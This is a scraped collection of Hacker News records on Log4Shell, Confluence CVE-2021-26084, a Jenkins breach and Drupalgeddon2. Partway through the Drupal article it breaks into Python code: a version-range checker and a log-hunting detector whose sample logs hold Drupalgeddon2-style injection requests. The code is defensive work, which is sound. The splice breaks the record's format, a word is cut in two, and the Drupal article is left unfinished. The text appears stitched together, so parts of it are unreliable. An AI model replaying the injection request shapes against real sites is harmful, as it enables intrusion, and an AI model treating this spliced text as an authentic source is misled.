"[](<https://thehackernews.com/new-images/img/a/AVvXsEhxt34pnwkNBgdh1y4-6xfSP-mpRKSltUMdSLDF55Eno17d47MYCQMSDAGq2OZeCWpHDNnZUH8W1fIjZdtvlDKtRo_8406-8p3Tt1czUwjmnUWHQH1uhmjFu2w55IgERDhFTLDY9xJoJtni4DCbI0Mq1L1iwjJ2yLvaZvWMTnwKtZmlFsZO1DMdbQ0a>)\n\nThreat actors are actively 
[weaponizing](<https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/>) unpatched servers affected by the newly identified \"[**Log4Shell**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)\" vulnerability in Log4j to install cryptocurrency miners and Cobalt Strike and to recruit the devices into a botnet, even as telemetry indicates the flaw was being exploited nine days before it came to light.\n\nNetlab, the network security division of Chinese tech giant Qihoo 360, [disclosed](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) that botnets such as [Mirai](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>) and [Muhstik](<https://thehackernews.com/2018/05/botnet-malware-hacking.html>) (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow their computing power for distributed denial-of-service (DDoS) attacks aimed at overwhelming a target and rendering it unusable. 
Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), CVSS score: 9.8) earlier this September.\n\nThe latest development comes as it has emerged that the vulnerability had been under attack for at least a week prior to its public disclosure on December 10, and companies like [Auvik](<https://www.reddit.com/r/msp/comments/rdba36/critical_rce_vulnerability_is_affecting_java/>), [ConnectWise Manage](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>), and [N-able](<https://www.n-able.com/security-and-privacy/apache-log4j-vulnerability>) have confirmed their services are impacted, widening the flaw's reach to more vendors.\n\n\"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC,\" Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) Sunday. \"That suggests it was in the wild at least nine days before publicly disclosed. 
However, don't see evidence of mass exploitation until after public disclosure.\" Cisco Talos, in an independent [report](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>), said it observed attacker activity related to the flaw beginning December 2.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgfMpATNB5GkuC13rGMq6XMiFBdOjwWBuD-ZOuvjNFP7YxSWaotzdhrzjdXbTIaMEp8-l6iWWDH92mwneLD8TjmjuxtRNakibAOsb2Bx7UplaRi0KIfAJe2kSIOkIyBGl9uSFCGFJoM8U83ckS-pICLmEcmdQGD1quBku8bU4z_kfoRubl5R-sNju8bog>)\n\nTracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (CVSS score: 10.0), the flaw is a remote code execution bug in Log4j, a Java-based open-source Apache logging framework broadly used in enterprise environments to record events and messages generated by software applications.\n\nAll an adversary has to do is get a specially crafted string containing a JNDI lookup (one naming an attacker-controlled LDAP or RMI server) logged by an affected Log4j 2 release (2.0-beta9 through 2.14.1): Log4j resolves the lookup at log time, retrieves a Java object from the server named in it and executes it, giving the threat actor control of the susceptible server.\n\n\"The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,\" Microsoft 365 Defender Threat Intelligence Team [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in an analysis. 
\"Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.\"\n\nIn particular, the Redmond-based tech giant said it detected a wealth of malicious activities, including installing Cobalt Strike to enable credential theft and lateral movement, deploying coin miners, and exfiltrating data from the compromised machines.\n\nThe situation has also left companies scrambling to roll out fixes for the bug. Network security vendor SonicWall, in an [advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032>), revealed its Email Security solution is affected, stating it's working to release a fix for the issue while it continues to investigate the rest of its lineup. Virtualization technology provider VMware, likewise, warned of \"[exploitation attempts in the wild](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>),\" adding that it's pushing out patches to a number of its products.\n\nIf anything, incidents like these illustrate how a single flaw, when uncovered in packages incorporated in a lot of software, can have ripple effects, acting as a channel for further attacks and posing a critical risk to affected systems. \"All threat actors need to trigger an attack is one line of text,\" Huntress Labs Senior Security Researcher John Hammond [said](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>). \"There's no obvious target for this vulnerability \u2014 hackers are taking a spray-and-pray approach to wreak havoc.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T05:10:00", "type": "thn", "title": "Apache Log4j Vulnerability \u2014 Log4Shell \u2014 Widely Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-13T14:58:24", "id": "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "href": "https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. 
Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a popular web-based documentation service that lets teams create, collaborate on, and organize projects, offering a common platform for sharing information in corporate environments. 
It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. 
Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. 
Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-ECBRNAQfxt4/YTc5IJ3yF6I/AAAAAAAADvk/AKO-gQEBwOICCTQJArFbT7OQXrde61d-wCLcBGAsYHQ/s0/jenkin.jpg>)\n\nThe maintainers of Jenkins\u2014a popular open-source automation server software\u2014have disclosed a security breach after unidentified threat actors gained access to one of their servers by exploiting a recently disclosed vulnerability in Atlassian Confluence service to install a cryptocurrency miner.\n\nThe \"successful attack,\" which is believed to have occurred last week, was mounted against its Confluence service that had been deprecated since October 2019, leading the team to take the server offline, rotate privileged credentials, and reset passwords for developer accounts.\n\n\"At this time we have no reason to believe that any Jenkins releases, plugins, or source code have been affected,\" the company [said](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) in a statement published over the weekend.\n\nThe disclosure comes as the U.S. 
Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments.\n\nTracked as CVE-2021-26084 (CVSS score: 9.8), the flaw is an OGNL (Object-Graph Navigation Language) injection bug that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nAccording to Censys, a search engine for internet-connected devices, around 14,637 exposed and vulnerable Confluence servers were visible just before details of the flaw became public on August 25, a number that had dropped to 8,597 as of September 5 as companies applied Atlassian's patches and took affected servers off the internet.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T10:05:00", "type": "thn", "title": "Latest Atlassian Confluence Flaw Exploited to Breach Jenkins Project Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-07T10:05:28", "id": "THN:F076354512CA34C263F222F3D62FCB1E", "href": "https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:15", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhJ3jtRKAfkDnJBg2CSeJO9eEak4pHCPUwsoYC1yc8-mRtN2fWdq14kYmZ4eITvVA_TkOaz34D7Gfz2LSNKAbVwByP1IbkyZkXFdMhGnjmA1tSd6GffL2DMmgX3VEYI5N3wlRhVqGUmMzGn7YbisQQBHLt_xETCq41gult7pRhYNQ-b2eB8mGAOpaFD>)\n\nOpportunistic threat actors have been found actively exploiting a recently disclosed critical security flaw in Atlassian Confluence deployments across Windows and Linux to deploy web shells that result in the execution of crypto miners on compromised systems.\n\nTracked as **CVE-2021-26084** (CVSS score: 9.8), the vulnerability concerns an OGNL (Object-Graph Navigation Language) injection flaw that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\n\"A remote attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious parameter to a vulnerable server,\" researchers from Trend Micro [noted](<https://www.zerodayinitiative.com/blog/2021/9/21/cve-2021-26084-details-on-the-recently-exploited-atlassian-confluence-ognl-injection-bug>) in a technical write-up detailing the weakness. 
\"Successful exploitation can result in arbitrary code execution in the security context of the affected server.\"\n\nThe vulnerability, which resides in the Webwork module of Atlassian Confluence Server and Data Center, stems from an insufficient validation of user-supplied input, causing the parser to evaluate rogue commands injected within the OGNL expressions.\n\nThe in-the-wild attacks come after the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of mass exploitation attempts following the vulnerability's public disclosure in late August this year.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjXqPkBhwuKJGvxWO_1FjoHCeEAOKy7E3nNIvjWNAaBric3ybUCOe0G41xg2vfrMqSM83zyPKtMMcPzdThUioKg0niqP0et9VrT22pAmRJy9LwQNAVdvO8EvweuRbnJo7aiGWul1cqiTjlXFZw4WyEKmu-Nh6M-u0F-6LxkM2A7vbklzdx2bLU2Afye>)\n\nIn [one such attack](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) observed by Trend Micro, z0Miner, a trojan and cryptojacker, was found updated to leverage the remote code execution (RCE) flaw to distribute next-stage payloads that act as a channel to maintain persistence and deploy cryptocurrency mining software on the machines. 
Imperva, in an independent analysis, [corroborated the findings](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>), uncovering similar intrusion attempts that were aimed at running the XMRig cryptocurrency miner and other post-exploitation scripts.\n\nAlso detected by Imperva, [Juniper](<https://blogs.juniper.net/en-us/threat-research/muhstik-botnet-targeting-confluence-servers-with-cve-2021-26084>), and [Lacework](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>) is exploitation activity conducted by Muhstik, a China-linked [botnet](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) known for its [wormlike self-propagating capability](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>) to infect Linux servers and IoT devices since at least 2018.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgbIFk6qnQLGyg0h6oyooiekl3f6weqXbcxtTWMY4--VWq6XAjXEMzqzKoFtdfOJrwkHrMnA7zKzbUIZD20ywylRihiM2XgTRt1QSmjWMQkRomZ48jftJM5I_98FvPixhOZqMp_rr6nq7vQBTlnknWVxhVXzyno6XFul5zNkpbdaqmYBM9R--Nxg2HT>)\n\nFurthermore, Palo Alto Networks' Unit 42 threat intelligence team said it [identified and prevented attacks](<https://www.paloaltonetworks.com/blog/security-operations/cve-2021-26084-linux-exploitation-in-the-wild/>) that were orchestrated to upload its customers' password files as well as download malware-laced scripts that dropped a miner and even open an interactive reverse shell on the machine.\n\n\"As is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain,\" Imperva researchers said. 
\"RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T15:31:00", "type": "thn", "title": "Atlassian Confluence RCE Flaw Abused in Multiple Cyberattack Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-29T03:33:58", "id": "THN:5763EE4C0049A18C83419B000AAB347A", "href": "https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:30", "description": 
"[](<https://thehackernews.com/images/-gX6_9UgesoQ/WxZDSXy_kxI/AAAAAAAAw7s/DgAtVJgBWSMc7xSNuowSunrFzg-X0mqrQCLcBGAs/s728-e100/drupal-hacking.png>)\n\nHundreds of thousands of websites running on the Drupal CMS\u2014including those of major educational institutions and government organizations around the world\u2014have been found vulnerable to a [highly critical flaw](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) for which security patches were released almost two months ago. \n \nSecurity researcher Troy Mursch scanned the whole Internet and [found](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) that over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repeated warnings. \n \n[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) is a highly critical remote code execution vulnerability disclosed in late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations with the privileges of the web server user. \n \nBecause Drupalgeddon2 was certain to attract motivated attackers, the Drupal team urged all website administrators to install the security patches immediately after their release in late March and initially withheld technical details of the flaw. 
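Both the Confluence advisory (CVE-2021-26084, whose affected ranges and fix releases are listed earlier on this page) and the Drupalgeddon2 ranges quoted above are branch-specific: a version can be newer than one fix release and still be vulnerable (Confluence 7.5.0 is newer than 7.4.11, yet only 7.11.6 fixes its branch), so a single "greater than the fix" comparison gets the answer wrong. The Python below is an added example for this page, not tooling from Atlassian, Drupal or the article; the host inventory is constructed. It encodes each advisory as (first affected, first fixed) pairs per branch and triages an inventory against them.

```python
"""Branch-aware vulnerable-range check for CVE-2021-26084 and CVE-2018-7600.

Added example, not tooling from Atlassian, Drupal or the article. Ranges are the
ones the advisories give: each entry is (first affected, first fixed) on one
release branch, with None meaning "everything earlier". The inventory is constructed.
"""
import re

VERSION = re.compile(r"^\s*v?(\d+(?:\.\d+)*)")

# Branch ranges: lower bound inclusive (None = all earlier), fix release exclusive.
RANGES = {
    "CVE-2021-26084": [                 # Atlassian Confluence Server / Data Center
        (None, "6.13.23"),
        ("6.14.0", "7.4.11"),
        ("7.5.0", "7.11.6"),
        ("7.12.0", "7.12.5"),           # 7.13.0 shipped already fixed
    ],
    "CVE-2018-7600": [                  # Drupal core (Drupalgeddon2)
        ("6.0", "7.58"),                # Drupal 6 is EOL but affected; 7.x fixed in 7.58
        ("8.0.0", "8.3.9"),
        ("8.4.0", "8.4.6"),
        ("8.5.0", "8.5.1"),
    ],
}


def parse(version):
    """'7.4.11', 'v8.5.1', '7.12.4-rc1' -> tuple of ints (qualifiers ignored)."""
    m = VERSION.match(version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(x) for x in m.group(1).split("."))


def affected(cve, version):
    """True when version falls inside any vulnerable branch range for cve."""
    v = parse(version)
    for low, fixed in RANGES[cve]:
        if (low is None or parse(low) <= v) and v < parse(fixed):
            return True
    return False


def triage(inventory):
    """inventory: (host, cve, version) triples -> those still needing the patch."""
    return [(host, cve, ver) for host, cve, ver in inventory if affected(cve, ver)]


INVENTORY = [                            # constructed, not real hosts
    ("wiki-01", "CVE-2021-26084", "7.4.10"),
    ("wiki-02", "CVE-2021-26084", "7.5.0"),     # newer than 7.4.11, still vulnerable
    ("wiki-03", "CVE-2021-26084", "7.13.0"),
    ("wiki-04", "CVE-2021-26084", "6.13.23"),
    ("www-01",  "CVE-2018-7600",  "7.57"),
    ("www-02",  "CVE-2018-7600",  "8.5.1"),
    ("www-03",  "CVE-2018-7600",  "8.4.5"),
    ("www-04",  "CVE-2018-7600",  "6.38"),
]

if __name__ == "__main__":
    for host, cve, ver in triage(INVENTORY):
        print(f"{host}: {cve} applies to {ver}")
```

Feed it the versions your asset inventory or banner scan reports; the version string is the only input it trusts, so a host that reports a fixed version but was compromised before patching still needs the post-compromise checks the Drupal advisory describes.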
\n\n\n[](<https://thehackernews.com/images/-qvQEU0cUz6E/WxY-T5CZxNI/AAAAAAAAw7U/EIiGG2uydmwMhw368wlEM0s5XzpFMGG8ACLcBGAs/s728-e100/drupal-hacking-exploit.png>)\n\nAttackers nevertheless started exploiting the vulnerability only two weeks later, once complete details and proof-of-concept (PoC) [exploit code for Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) were published online, which was followed by large-scale Internet scanning and exploitation attempts. \n \nShortly after that, within hours of the details going public, we saw attackers develop [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging the Drupalgeddon2 vulnerability to inject [cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites. \n \nMursch scanned the Internet and found nearly 500,000 websites running Drupal 7, of which 115,070 were still running an outdated version vulnerable to Drupalgeddon2. \n \nWhile analyzing vulnerable websites, Mursch noticed that hundreds of them\u2014including those of a Belgian police department, the Colorado Attorney General's office, Fiat subsidiary Magneti Marelli and a food truck locating service\u2014had already been targeted by a new cryptojacking campaign. \n \nMursch also found some infected websites in the campaign that had already upgraded to the latest Drupal version, but the cryptojacking malware was still present. 
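Drupalgeddon2 works by smuggling Form API render-array properties (keys that begin with '#', such as #post_render or #markup) into user-supplied input, which the FAPI AJAX path then treats as part of the internal form structure; Drupal's fix strips such keys from incoming request data before the form system sees them. The Python below is an added example written for this page, not Drupal's own PHP or the article's code: nest() builds the PHP-style nested array an attacker's parameters produce, strip_hash_keys() models the sanitizer the fix introduced, and suspicious_requests() hunts access logs for the same indicator, which is how a site that upgraded after the fact can still find the earlier exploitation attempts. The log lines are constructed; the /user/register?element_parents=account/mail/%23value request shape is taken from the public PoC rather than from the article, an assumption stated here.

```python
"""Model of the Drupalgeddon2 input-sanitization fix plus a log hunt for attempts.

Added example, not Drupal's own code. Drupal's fix strips request ke
ys that
start with '#' (render-array properties) before the Form API sees them; the
same indicator, plus an element_parents path naming a '#' property (the request
shape used by the public PoC, an assumption here), is what the log hunt flags.
"""
import re
from urllib.parse import parse_qsl, urlsplit

BRACKET = re.compile(r"\[([^\]]*)\]")
REQUEST = re.compile(r'"(?:GET|POST|PUT|PATCH) (\S+) HTTP/')


def segments(name):
    """'mail[#post_render][]' -> ['mail', '#post_render', '']"""
    base = name.split("[", 1)[0]
    return [base] + BRACKET.findall(name[len(base):])


def nest(pairs):
    """Build the nested structure PHP derives from bracketed parameter names.
    A trailing [] appends under the next numeric index (kept as a dict here)."""
    root = {}
    for name, value in pairs:
        segs = segments(name)
        node = root
        for seg in segs[:-1]:
            seg = seg or str(len(node))
            child = node.get(seg)
            if not isinstance(child, dict):      # a later structured key wins, as in PHP
                child = node[seg] = {}
            node = child
        last = segs[-1] or str(len(node))
        node[last] = value
    return root


def strip_hash_keys(data):
    """Drop '#'-prefixed keys at any depth: the shape of the Drupal fix."""
    if isinstance(data, dict):
        return {k: strip_hash_keys(v) for k, v in data.items() if not str(k).startswith("#")}
    if isinstance(data, list):
        return [strip_hash_keys(v) for v in data]
    return data


def suspicious_requests(lines):
    """Return (line_no, path, reasons) for requests carrying FAPI property injection."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        reasons = []
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if any(seg.startswith("#") for seg in segments(name)):
                reasons.append(f"render property in parameter name {name}")
            if name == "element_parents" and "#" in value:
                reasons.append(f"element_parents={value}")
        if reasons:
            hits.append((no, parts.path, reasons))
    return hits


# Constructed sample in Apache combined format; IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.4 - - [13/Apr/2018:09:12:01 +0000] "GET /node/1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [13/Apr/2018:09:12:03 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 412 "-" "python-requests/2.18"',
    '198.51.100.8 - - [13/Apr/2018:09:15:40 +0000] "GET /?q=user/password&name%5B%23post_render%5D%5B%5D=x&name%5B%23type%5D=markup&name%5B%23markup%5D=y HTTP/1.1" 200 301 "-" "curl/7.58"',
    '192.0.2.12 - - [13/Apr/2018:09:20:00 +0000] "GET /search/node?keys=%23drupal HTTP/1.1" 200 7800 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for no, path, reasons in suspicious_requests(SAMPLE_LOG):
        print(f"line {no} {path}: " + "; ".join(reasons))
    injected = nest(parse_qsl("name[#post_render][]=x&name[#type]=markup", keep_blank_values=True))
    print("raw:      ", injected)
    print("sanitized:", strip_hash_keys(injected))
```

The last sample line shows the boundary: a '#' inside an ordinary value (a search for "#drupal") is not flagged, only a '#' that would become a render-array key or an element path. Access logs carry only the request line, so POST bodies that hold the payload are invisible here; hunting those needs web-application-firewall or application-level logs.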
